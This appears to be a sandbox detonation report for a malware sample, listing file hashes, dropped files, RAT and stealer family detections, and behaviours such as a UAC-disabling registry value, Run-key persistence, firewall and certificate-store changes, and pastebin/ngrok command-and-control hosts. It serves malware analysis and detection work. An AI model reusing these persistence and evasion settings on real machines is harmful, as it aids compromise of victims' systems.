SHA256 778c5bd282e7813255e67d8788f485086a451b8157f982f16a978c51bf93b190
SHA512 15667d4f0807e0a4f1a52bc5422fedc7184075437cf7b1aeaba8f0174838fa4cb0d1c1dc701c1849f9662363a89640cc5d1ac75d85763230e196c0671de0de01

C:\Users\Admin\AppData\Local\Temp\4ZAVHlJm6aW9.bat

MD5 bf3b4a3303d4e4271526b7f22f733671
SHA1 99ef51352cbd51e9823c19f4c4ecacf9646c74a9
SHA256 f11f3c82c646b1cfa86729a7e0d5998d5e0c860da226f475f84dd188d8dffd9d
SHA512 930c928874bef20a0275d34918b03c49ae3bd2f2d1ce20ef60778798b2785d5d634ce01b9d054ed32e4dbae7e9769b17469d67b33ddc8ab4e2382b5d6e91c256

memory/4396-3794-0x0000000000990000-0x00000000009A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\QZQBLEqosfSN.bat

MD5 0e4d3ee1393415299bffefbf16449903
SHA1 26f7be2f645c6ef728a975a07a2e9d119979af38
SHA256 fef1fb06c66f5c08ae32ed88638c0554db6b35b5c992b21b3748f464845879ce
SHA512 389c6ff94d4496014cad80ed91f80e647ebd22fb2b690900bf5c7a19b0050a6d110bb616aea602d526713eb89957ea84f52c5ab1a2bb12b54ddcac6e0378b7ae

memory/3160-3808-0x00000000009F0000-0x0000000000A76000-memory.dmp

C:\Users\Admin\AppData\Roaming\Windows Defender\comctl32.exe

MD5 4e7b96fe3160ff171e8e334c66c3205c
SHA1 ad9dbdfb52d3c2ee9a57fe837605ec233db43a7f
SHA256 e698a786c4dcd964e54903a98bfaa0638ce8f52e02658f1223805c6e3b1ca83c
SHA512 2e8968ce87a1670ff6b49f92beaee8c7d1b2fd94bc216507e255bb2a54d4073fbbd20b39e188fd40eb049da59bf27f9aed729c390525232e4a904e71e10f9b48

memory/1096-3853-0x0000000001390000-0x0000000001416000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mgfpRTWIUj34.bat

MD5 92d0437f9ef305acfb2e37cf61ab4299
SHA1 961cb6a196f31cb251b41c48c59e5b9ac8ac4940
SHA256 f2933fdc2daebf7b66b1aa76e083a7adb849dc87c2fcd765badd8da39d0c364a
SHA512 a6ad8adb5ed7ddb91e6209c7cefb5733dd97aae1b77dac05401c90b003669b7e798bddd8cd0a84a236965807a6c4da7137e68fe6e1f46111750003188fe5c284

memory/484-3867-0x0000000001170000-0x0000000001494000-memory.dmp

memory/1244-3868-0x0000000001120000-0x0000000001444000-memory.dmp

C:\Users\Admin\AppData\Roaming\WindowsLockerZAP\Windows Defender SmartScreen (32 bit).exe

MD5 ff8c68c60f122eb7f8473106d4bcf26c
SHA1 0efa03e7412e7e15868c93604372d2b2e6b80662
SHA256 5ff2becf2c56500cb71898f661c863e647a96af33db38d84d7921dc7dbf4f642
SHA512 ab92ef844a015c3fcbfba313872b922bff54184b25623ed34f4829bd66a95af081cdeefd35425a4d3b9d9085ccf8c25045cf6093d74a5c8c35012c1b7546688e

memory/3752-3874-0x0000000000370000-0x0000000000694000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ppDiKTAIxf8s.bat

MD5 cc0d7311ca2149f60e102772e1cdf151
SHA1 6fa746c971c5533982a04aa10b23d9a4450d7224
SHA256 70adf156f70b573664323edc9d5c4a14c925c33685842d78a5a962dc08d8ca93
SHA512 1c83bd1edf56f3f01c96bb9559bfaaf476fc630407b00d3a91c0aa6f4ba6c095c040faac0c07c2e1dc2272dea436e84484fb042a9e45bd86b4eb0e800feb9538

C:\Users\Admin\AppData\Local\Temp\q55bgR7thNVT.bat

MD5 de135cfab7f87be50527bc285b7e66ec
SHA1 99e2629402f10f6dbe960b14fc823e831774e72a
SHA256 d3e3cb66142ffa4dc11703fec9d15bb64c1d6aeca6cd6232470c5daa27acd230
SHA512 23d86cf0bbc4b0fa2e5648f83fdaff7be0ca5a0b92cabe41aad1dc560bb223ece725fd8d9a3ab469ac20aebe3e0c398ebc9e6b94e3e9597e5947205344fd5606

C:\Users\Admin\AppData\Local\Temp\X5hI9T69oF0z.bat

MD5 e47d6cfe6efa4613c51c12e6a70e1b9d
SHA1 efde6d054092a6316e8ce83de227f574b1a5e027
SHA256 c0a06c0c32457e2ffa7499a3fa6f769f765ab5c72db8a8b806ddee412806e356
SHA512 c3769fec0b94c8dc04e648e0a4825cff8d63df1d0a5eedf1af55e23f736485ed8f13fe2dce3d9e4294ab147c5c3106f1bd6fbdb8def04037b7dc82b52a8de888

C:\Users\Admin\AppData\Local\Temp\a\FXServer.exe

MD5 991e707e324731f86a43900e34070808
SHA1 5b5afd8cecb865de3341510f38d217f47490eead
SHA256 32d8c2a1bb4d5a515d9eb36c1286b0ac08624c8ea3df0e97f12391558ce81153
SHA512 07411dffbc6beff08a901afa8db3af4bc7d214407f7b20a8570e16b3900f512ad8ee2d04e31bb9d870585b9825e9102078f6c40eb6df292f09fffe57eea37f79

memory/3780-3953-0x0000000000240000-0x000000000024E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a\ciscotest.exe

MD5 0076324b407d0783137badc7600327a1
SHA1 29e6cb1f18a43b8e293539d50272898a8befa341
SHA256 55c727a9806966ec83f22702c1101c855a004c5658cf60e3c3499f895b994583
SHA512 96b08dd1a7abccefabe3568637c17f6ae2c04349488db8dc05b9dcaaaef6a041c36fa4a1f1841096d6622b9775099c7c7eb1497c57581cb444afeb481563cae4

memory/2664-3969-0x0000000000800000-0x0000000000812000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uTBZJw95QmYA.bat

MD5 d16ea7346ed37c055a4a03311b659f56
SHA1 fe6db9db72b7e04f0de9db2dc2ffdefcad8df826
SHA256 ebdd57723f85a59ac828e58d5f4ca4206c3fa014afd435465b2f988b892bb8d5
SHA512 480002fba1f1f429380b2a7c81f26a1226e46a492af103f7af12a2a8c7495f879be27a6bd850e9799e221e19be82bb2b8a84d2388e8d2c372b71d93c9dc90d77

memory/948-4015-0x0000000000FE0000-0x0000000001304000-memory.dmp

memory/4340-4028-0x00000000013B0000-0x00000000016D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\W0OTT0ZRdELW.bat

MD5 fe752131e279b994b7207b3f5d4a3767
SHA1 1653cfe79b68844de3bbc7812b2a42f61b42f5d9
SHA256 2451595911d8e9aef23573afe78cc2fb78acea35420d7f36b8aea9a12a78a03d
SHA512 f24fe7a679b9f14b7d4e6684e13ec2a80c5406f8471261dffef2a373756ddc33e9a3a7f377993f0683916a713f638a75cf3d064b54643b226c439bb37176f1d2

C:\Users\Admin\AppData\Local\Temp\QCGANXGlRZof.bat

MD5 5629f59329611f37428fa42124d79d80
SHA1 16776c1fcf26abcba43d81dfb5c10953fb4429ce
SHA256 16ed3860e2ab444cd9ad1b687650e99c570ab836a405fb3517cd5c0016a17c93
SHA512 106c512573c3b5e93e091812f94afadf7a1d92a2f22505a1e2f273b92a4309f6ab94e5e792a99dec8ec0e728d2a4220dc4f974effd5723e320d74f5219f6b7a7

C:\Users\Admin\AppData\Local\Temp\3wSQiyOdnYt3.bat

MD5 9ac77a50aafb7fbf78bfbc0f978be6c9
SHA1 ba0f1146d9727bb299eac05eb51474df81594ce6
SHA256 f0ed61ae18a9a4af3898eda4272bd5f21b04ce9d3771284061ff927d9b5427c0
SHA512 061ebea055dfb993b90a35b5f8fcaa9ed8ff2656188181ebbd5741bb673989388ee3c554caa2749fad513ccd68a6d5aa5f5f4999e2129d6f7127df2577bede96

Analysis: behavioral2

Detonation Overview

Submitted

2025-01-26 00:01

Reported

2025-01-26 00:04

Platform

win10v2004-20241007-en

Max time kernel

15s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

defense_evasion trojan
Description: Set value (int)
Indicator: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Process: C:\Windows\SysWOW64\reg.exe
Target: N/A

Vidar

stealer vidar

Vidar family

vidar

Xred

backdoor xred

Xred family

xred

Xworm

trojan rat xworm

Xworm family

xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description: Key created
Indicator: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Process: C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
Target: N/A

Description: Set value (str)
Indicator: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\""
Process: C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
Target: N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description: Key value queried
Indicator: \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation
Target: N/A
Process (one row per query, eight queries in total):
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
C:\ProgramData\Synaptics\Synaptics.exe
C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
C:\Users\Admin\AppData\Local\Temp\a\1.exe
C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe
C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe
C:\Windows\SysWOW64\WScript.exe

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VisualStudioServer = "\"C:\\ProgramData\\Bitdefender\\$77-Bitdefender.exe\"" C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\TransferRare C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\EscortsNascar C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\NavyPromising C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\HonoluluSyndrome C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\OxfordPrintable C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\ViBases C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
File opened for modification C:\Windows\ImmediatelyBros C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\a\36.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\{458A5B37-AEF9-45F1-A590-D7C6552395DD}\.cr\BQEHIQAG.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Synaptics\Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Update.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\T.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\windows.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\test.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\BQEHIQAG.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\ProgramData\Synaptics\Synaptics.exe N/A
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Modifies system certificate store

defense_evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob value omitted] C:\Users\Admin\AppData\Local\Temp\a\test.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\a\test.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Temp\{6F99A251-ABA9-41FB-8179-665CE5A4B922}\.ba\DBDownloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Helpdemo_vqz_test\DBDownloader.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\Update.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\test.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\a\zoom_invitecode=23884232.zoom.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
